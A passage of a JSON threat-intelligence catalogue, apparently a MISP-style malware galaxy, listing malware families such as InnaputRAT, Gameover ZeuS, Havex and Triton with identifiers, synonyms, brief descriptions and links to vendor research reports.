"GrayBird"
],
"type": [],
"refs": [
"https://twitter.com/anyrun_app/status/976385355384590337",
"https://secrary.com/ReversingMalware/Colony_Bandios/",
"https://pastebin.com/GtjBXDmz"
]
}
},
{
"uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c",
"value": "SeaSalt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601",
"value": "Dairy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302",
"value": "Crossrider",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social"
]
}
},
{
"uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2",
"value": "JripBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
]
}
},
{
"uuid": "38734f44-ebc4-4250-a20e-5dac0fb5c0ed",
"value": "Socks5 Systemz",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "91af1080-6378-4a90-ba1e-78634cd31efe",
"value": "EtumBot",
"description": "",
"meta": {
"synonyms": [
"HighTide"
],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf",
"https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html",
"https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise"
]
}
},
{
"uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d",
"value": "Golroted",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html"
]
}
},
{
"uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9",
"value": "Elirks",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/"
]
}
},
{
"uuid": "2789b246-d762-4d38-8cc8-302293e314da",
"value": "LogPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html"
]
}
},
{
"uuid": "dd486e92-54fe-4306-9aab-05863cb6c6e1",
"value": "InnaputRAT",
"description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/"
]
}
},
{
"uuid": "c21335f5-b145-4029-b1bc-161362c7ce80",
"value": "PadCrypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://johannesbader.ch/2016/03/the-dga-of-padcrypt/",
"https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/"
]
}
},
{
"uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d",
"value": "FriedEx",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/"
]
}
},
{
"uuid": "81ca4876-b4a4-43e9-b8a9-8a88709dd3d2",
"value": "Darkmoon",
"description": "",
"meta": {
"synonyms": [
"Chymine"
],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html",
"https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml",
"http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html"
]
}
},
{
"uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f",
"value": "Gameover P2P",
"description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers.",
"meta": {
"synonyms": [
"ZeuS P2P",
"GOZ"
],
"type": [],
"refs": [
"https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf",
"http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf",
"https://www.wired.com/?p=2171700",
"https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
"https://www.fox-it.com/nl/wp-content/uploads/sites/12/FoxIT-Whitepaper_Blackhat-web.pdf"
]
}
},
{
"uuid": "b74747e0-59ac-4adf-baac-78213a234ff5",
"value": "BatchWiper",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html"
]
}
},
{
"uuid": "d9215579-eee0-4e50-9157-dba7c3214769",
"value": "GuiInject",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/"
]
}
},
{
"uuid": "bcc8e3ef-fc5e-4d44-9011-4d429bac0f26",
"value": "PubNubRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html"
]
}
},
{
"uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29",
"value": "Magniber",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/",
"https://www.youtube.com/watch?v=lqWJaaofNf4",
"http://asec.ahnlab.com/1124"
]
}
},
{
"uuid": "f7081626-130a-48d5-83a9-759b3ef198ec",
"value": "Murofet",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "8468f2a7-f541-4130-b57a-ea678aa30a0a",
"value": "Mokes",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/"
]
}
},
{
"uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254",
"value": "EDA2",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/815861135882780673"
]
}
},
{
"uuid": "07a41ea7-17b2-4852-bfd7-54211c477dc0",
"value": "Felismus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments"
]
}
},
{
"uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4",
"value": "SunOrcal",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/",
"http://pwc.blogs.com/cyber_security_updates/2016/03/index.html"
]
}
},
{
"uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369",
"value": "Sathurbot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/"
]
}
},
{
"uuid": "aff47054-7130-48ca-aa2c-247bdf44f180",
"value": "Unidentified 029",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d",
"value": "Lambert",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://adelmas.com/blog/longhorn.php",
"https://www.youtube.com/watch?v=jeLd-gw2bWo",
"https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7",
"https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/"
]
}
},
{
"uuid": "127c3d76-6323-4363-93e0-cd06ade0dd52",
"value": "GPCode",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html",
"http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/",
"https://de.securelist.com/analysis/59479/erpresser/",
"ftp://ftp.tuwien.ac.at/languages/php/oldselfphp/internet-security/analysen/index-id-200883584.html",
"https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2"
]
}
},
{
"uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b",
"value": "Bedep",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "4734c5a4-e63b-4bb4-8c01-ab0c638a6c21",
"value": "HerpesBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "5d9a27e7-3110-470a-ac0d-2bf00cac7846",
"value": "Ranbyus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/",
"https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/",
"http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html",
"https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/"
]
}
},
{
"uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937",
"value": "Nymaim",
"description": "",
"meta": {
"synonyms": [
"nymain"
],
"type": [],
"refs": [
"https://www.cert.pl/en/news/single/nymaim-revisited/"
]
}
},
{
"uuid": "4da036c4-b76d-4f25-bc9e-3c5944ad0993",
"value": "Xpan",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/research/78110/xpan-i-am-your-father/",
"https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/"
]
}
},
{
"uuid": "045df65f-77fe-4880-af34-62ca33936c6e",
"value": "Odinaff",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
]
}
},
{
"uuid": "9218630d-0425-4b18-802c-447a9322990d",
"value": "Zollard",
"description": "",
"meta": {
"synonyms": [
"darlloz"
],
"type": [],
"refs": [
"https://blogs.cisco.com/security/the-internet-of-everything-including-malware"
]
}
},
{
"uuid": "40c66571-164c-4050-9c84-f37c9cd84055",
"value": "Unidentified 020 (Vault7)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://wikileaks.org/ciav7p1/cms/page_34308128.html"
]
}
},
{
"uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2",
"value": "TorrentLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall/",
"http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/"
]
}
},
{
"uuid": "9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b",
"value": "Cutwail",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "8f785ee5-1663-4972-9a64-f02e7c46ba66",
"value": "gamapos",
"description": "",
"meta": {
"synonyms": [
"pios"
],
"type": [],
"refs": [
"http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf"
]
}
},
{
"uuid": "d8295eba-60ef-4900-8091-d694180de565",
"value": "Nautilus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.ncsc.gov.uk/alerts/turla-group-malware"
]
}
},
{
"uuid": "7be3f3b3-5047-4422-ad9d-86a7bc321931",
"value": "X-Agent",
"description": "",
"meta": {
"synonyms": [
"splm",
"chopstick"
],
"type": [],
"refs": [
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
"https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/",
"http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
"http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf"
]
}
},
{
"uuid": "af1c99be-e55a-473e-abed-726191e1da05",
"value": "BadEncript",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/PhysicalDrive0/status/833067081981710336"
]
}
},
{
"uuid": "8f78a226-1314-4778-9bc2-ca850e9e0037",
"value": "X-Agent",
"description": "",
"meta": {
"synonyms": [
"Popr-d30"
],
"type": [],
"refs": [
"http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/",
"http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/"
]
}
},
{
"uuid": "6aabb492-e282-40fb-a840-fe4e643ec094",
"value": "Allaple",
"description": "",
"meta": {
"synonyms": [
"Starman"
],
"type": [],
"refs": [
"https://trapx.com/wp-content/uploads/2017/08/White_Paper_TrapX_AllapleWorm.pdf",
"https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/"
]
}
},
{
"uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e",
"value": "Naikon",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/analysis/publications/69953/the-naikon-apt/",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
]
}
},
{
"uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597",
"value": "FruitFly",
"description": "",
"meta": {
"synonyms": [
"Quimitchin"
],
"type": [],
"refs": [
"https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/",
"https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/",
"https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html",
"https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/",
"https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"
]
}
},
{
"uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52",
"value": "ThumbThief",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/"
]
}
},
{
"uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139",
"value": "CCleaner Backdoor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities",
"https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident",
"http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/",
"https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident",
"http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html",
"http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/",
"https://blog.avast.com/progress-on-ccleaner-investigation",
"https://www.wired.com/story/ccleaner-malware-targeted-tech-firms",
"https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer",
"https://twitter.com/craiu/status/910148928796061696",
"https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/",
"http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor",
"https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/",
"http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html"
]
}
},
{
"uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795",
"value": "ARS VBS Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/",
"https://twitter.com/Racco42/status/1001374490339790849"
]
}
},
{
"uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a",
"value": "Nocturnal Stealer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap"
]
}
},
{
"uuid": "72961adc-ace1-4593-99f1-266119ddeccb",
"value": "Unidentified 001",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4",
"value": "ThunderShell",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/Mr-Un1k0d3r/ThunderShell"
]
}
},
{
"uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb",
"value": "Karagany",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
]
}
},
{
"uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd",
"value": "Ghole",
"description": "",
"meta": {
"synonyms": [
"CoreImpact (Modified)"
],
"type": [],
"refs": [
"http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf",
"https://www.coresecurity.com/core-impact"
]
}
},
{
"uuid": "989330e9-52da-4489-888b-686429db3a45",
"value": "ZhMimikatz",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "ab2a63f1-1afd-44e7-9cf4-c775dbee78f4",
"value": "Vreikstadi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/malware_traffic/status/821483557990318080"
]
}
},
{
"uuid": "1a1fd8f1-1fe4-4dc7-bbef-ad0563db3010",
"value": "win.phorpiex",
"description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.",
"meta": {
"synonyms": [
"Trik"
],
"type": [],
"refs": [
"https://www.johannesbader.ch/2016/02/phorpiex/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/",
"https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/",
"https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows"
]
}
},
{
"uuid": "246060e5-1685-4e97-a6c6-994b3879c8fa",
"value": "Crisis",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?",
"http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html",
"https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines"
]
}
},
{
"uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a",
"value": "Stinger",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "c7ab9e5a-0ec9-481e-95ec-ad08f06cf985",
"value": "HTML5 Encoding",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/"
]
}
},
{
"uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54",
"value": "AMTsol",
"description": "",
"meta": {
"synonyms": [
"Adupihan"
],
"type": [],
"refs": [
"https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/",
"http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf"
]
}
},
{
"uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9",
"value": "CsExt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34",
"value": "Thanatos Ransomware",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html",
"https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/",
"https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/"
]
}
},
{
"uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665",
"value": "DiamondFox",
"description": "",
"meta": {
"synonyms": [
"Crystal",
"Gorynch",
"Gorynych"
],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/",
"http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/",
"https://www.scmagazine.com/inside-diamondfox/article/578478/",
"https://blog.cylance.com/a-study-in-bots-diamondfox",
"https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/"
]
}
},
{
"uuid": "7eeafa7c-0282-4667-bb1a-5ebc3a845d6d",
"value": "Spora",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/",
"https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/",
"https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas",
"https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware",
"https://github.com/MinervaLabsResearch/SporaVaccination",
"http://malware-traffic-analysis.net/2017/01/17/index2.html"
]
}
},
{
"uuid": "c8a7c6e7-c6d3-4978-8a1d-190162de5e0d",
"value": "Matryoshka RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.clearskysec.com/tulip/"
]
}
},
{
"uuid": "168bf2a1-45a5-41ac-b364-5740e7ce9757",
"value": "Unidentified 042",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/"
]
}
},
{
"uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c",
"value": "TinyTyphon",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
]
}
},
{
"uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c",
"value": "Uroburos",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/",
"https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/"
]
}
},
{
"uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872",
"value": "NavRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.talosintelligence.com/2018/05/navrat.html?m=1"
]
}
},
{
"uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921",
"value": "CryptoMix",
"description": "",
"meta": {
"synonyms": [
"CryptFile2"
],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/",
"https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/"
]
}
},
{
"uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a",
"value": "Havex RAT",
"description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.f-secure.com/weblog/archives/00002718.html"
]
}
},
{
"uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5",
"value": "GhostCtrl",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/android-backdoor-ghostctrl-can-silently-record-your-audio-video-and-more/"
]
}
},
{
"uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112",
"value": "Jaku",
"description": "",
"meta": {
"synonyms": [
"Reconcyc"
],
"type": [],
"refs": [
"https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf",
"https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146"
]
}
},
{
"uuid": "79606b2b-72f0-41e3-8116-1093c1f94b15",
"value": "win.triton",
"description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers.",
"meta": {
"synonyms": [
"Trisis",
"HatMan"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html",
"https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware",
"https://github.com/ICSrepo/TRISIS-TRITON-HATMAN",
"https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf",
"https://dragos.com/blog/trisis/TRISIS-01.pdf"
]
}
},
{
"uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f",
"value": "Helauto",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "1eceb5c0-3a01-43c2-b204-9957b15cf763",
"value": "badflick",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html"
]
}
},
{
"uuid": "b7dc52a1-7423-4a7a-a102-1df6122187ad",
"value": "DualToy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/"
]
}
},
{
"uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0",
"value": "Lamdelin",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/"
]
}
},
{
"uuid": "e437f01c-8040-4098-a3fa-20154b58c928",
"value": "PC Surveillance System",
"description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies.",
"meta": {
"synonyms": [
"PSS"
],
"type": [],
"refs": [
"https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/"
]
}
},
{
"uuid": "8b33ba21-9af7-4536-bd02-23dd863147e8",
"value": "Kardon Loader",
"description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/",
"https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab"
]
}
},
{
"uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae",
"value": "WebC2-Table",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "21ab9e14-602a-4a76-a308-dbf5d6a91d75",
"value": "Sedreco",
"description": "",
"meta": {
"synonyms": [
"eviltoss",
"azzy"
],
"type": [],
"refs": [
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
"https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/",
